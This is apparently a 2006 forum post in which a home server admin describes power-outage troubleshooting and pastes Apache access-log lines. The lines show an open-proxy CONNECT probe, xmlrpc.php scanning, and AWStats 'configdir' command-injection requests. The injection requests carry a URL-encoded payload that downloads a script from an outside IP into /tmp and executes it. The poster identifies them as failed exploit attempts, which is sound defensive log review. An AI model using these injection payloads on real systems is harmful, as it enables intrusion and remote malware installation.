The su thing might have been the cause for the command not found errors, although I usually ssh in to the box as root when I am messing with services.
I found out that the power must have gone out while I was gone, so that explains why my uptime went from 165 days to 55 minutes.
I will do some log checking when I get the system back online (shut it down to clean out and do some work on).
The permission thing is quite odd, considering it has the same permissions as another file in the same folder, which works fine.
Quite a bit of dust will collect on fans and whatever is directly in front of them after running for 165 days
\
edit: the box is back online now, and I've been going through the httpd access log.
Nothing really odd in it aside from this which appears 5 or 6 times:
82.96.96.3 - - [13/Feb/2006:15:56:21 -0500] "CONNECT 82.96.96.3:802 HTTP/1.0" 200 24281 "-" "-"
82.96.96.3 - - [13/Feb/2006:15:56:21 -0500] "POST
http://82.96.96.3:802/ HTTP/1.0" 200 24281 "-" "-"
Going to that address shows a bunch of random numbers/letters
L9G90WDS0ZY2JMMPU1C7EP0XJ205A5CTI1TLJ6S8R77EL20DAKQPSEE728WV2ZD44AY3GC4JL0W69AYY
I also noticed a bunch of this (none of these files exist)
65.71.146.93 - - [14/Feb/2006:10:06:32 -0500] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 25103 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:33 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 25103 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:36 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 25103 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:36 -0500] "POST /xmlrpc.php HTTP/1.1" 404 25103 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:40 -0500] "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:43 -0500] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:45 -0500] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:44 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:48 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:48 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:49 -0500] "POST /xmlrpc.php HTTP/1.1" 404 25103 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:51 -0500] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
65.71.146.93 - - [14/Feb/2006:10:06:52 -0500] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
The first few items here defiantely look like an attempted bug exploit for some script. Fortunately, that doesn't exist on my server.
Now to run this chkrootkit thing.